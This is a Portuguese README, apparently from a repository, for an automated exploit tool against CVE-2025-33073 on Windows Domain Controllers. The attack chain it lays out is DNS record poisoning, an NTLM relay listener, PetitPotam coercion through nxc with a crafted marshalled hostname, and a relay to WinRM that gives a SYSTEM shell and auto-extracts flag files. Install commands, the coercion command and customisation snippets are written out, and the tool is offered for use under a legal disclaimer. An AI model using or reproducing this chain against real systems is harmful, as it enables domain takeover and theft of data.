
Ferramenta universal de exploração para CVE-2025-33073 direcionada a Controladores de Domínio Windows com privilégios DNSAdmins e WinRM habilitado.

Ferramenta de exploração universal para CVE-2025-33073 visando Controladores de Domínio Windows com privilégios DNSAdmins e WinRM habilitado.
CVE-2025-33073 é uma vulnerabilidade crítica que permite a atacantes alcançar execução de código em nível de SYSTEM em Controladores de Domínio Windows por meio de uma combinação de:
Este PoC fornece uma estrutura de exploração universal e automatizada compatível com qualquer domínio, qualquer nome de usuário e qualquer ambiente CTF.
# Required tools
sudo apt-get update
sudo apt-get install -y python3 python3-pip netcat-openbsd dnsutils
# Python dependencies
pip3 install impacket netexec
# Clone krbrelayx
git clone https://github.com/dirkjanm/krbrelayx
# Clone this repository
git clone https://github.com/uziii2208/CVE-2025-33073
cd CVE-2025-33073
# Make exploit executable
chmod +x exploit.sh
# Verify tools installation
./exploit.sh # Will check all dependencies
./exploit.sh
O script solicitará:
Terminal 1 - Execute o exploit:
./exploit.sh
# Follow the interactive prompts
# Wait for: "[!] RELAY READY! OPEN NEW TERMINAL → PASTE COERCE COMMAND!"
Terminal 2 - Execute o comando de coerção (copie da saída do Terminal 1):
nxc smb 192.168.1.10 -u 'username' -p 'password' \
-M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.corp.local
Resultado:
O script procura e extrai automaticamente:
*flag*.txt*root*.txt*user*.txtproof.txtLocalizadas em: C:\Users\*\Desktop\
Todas as saídas salvas em: /0pwn_exploit_<TIMESTAMP>/
relay.log - Saída do servidor NTLM relaydns.log - Logs das operações de DNSshell_output.log - Comandos do shell e flags extraídas1. DNS Poisoning (krbrelayx.dnstool)
└─> Modify/Create DNS record pointing to attacker IP
2. NTLM Relay Server (ntlmrelayx.py)
└─> Listen for incoming NTLM authentication
3. Coercion (nxc + PetitPotam)
└─> Force DC to authenticate to attacker IP
4. Relay → WinRMS
└─> Relay authentication to target WinRMS
5. SYSTEM Shell
└─> Execute commands as SYSTEM
6. Auto Flag Extraction
└─> Search and extract all flags
Edite a variável LONGHOST em exploit.sh:
LONGHOST="localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
Modifique a função run_shell_commands() para procurar diferentes padrões de arquivos:
# Add custom patterns here
echo "powershell \"Get-ChildItem -Path 'C:\\Users\\*\\Desktop' -Include '*custom*.txt' ...\""
Este PoC é fornecido para:
O acesso não autorizado a sistemas de computador é ilegal.
net group "DNSAdmins" /domainping <DC_IP>nxc smb <DC_IP> -u username -p passwordwinrm quickconfigshell_output.log para errosnc -zv 127.0.0.1 <SHELL_PORT>run_shell_commands()/0pwn_exploit_1234567890/
├── relay.log # NTLM relay server output
├── dns.log # DNS operation details
└── shell_output.log # Extracted flags & command output
# View relay events
grep "SYSTEM SHELL" /0pwn_exploit_*/relay.log
# Extract all flags
grep "===" /0pwn_exploit_*/shell_output.log -A 10
# Check DNS operations
cat /0pwn_exploit_*/dns.log
[Demonstração e Capturas de Tela] - [Em Breve]

0pwn (uziii2208) - Conceito original e pesquisa Aprimorado por IA - Melhorias v1.0 e extração automática de flags
Licença MIT - Consulte o arquivo LICENSE para obter detalhes
AVISO LEGAL:
Este software é fornecido apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal e punível por lei.
Ao usar esta ferramenta, você concorda em:
Contribuições são bem-vindas! Envie issues e pull requests.
Para problemas, dúvidas ou melhorias:
Status: ✅ Testado e Verificado Versão: 1.0 (Universal) Última Atualização: 2025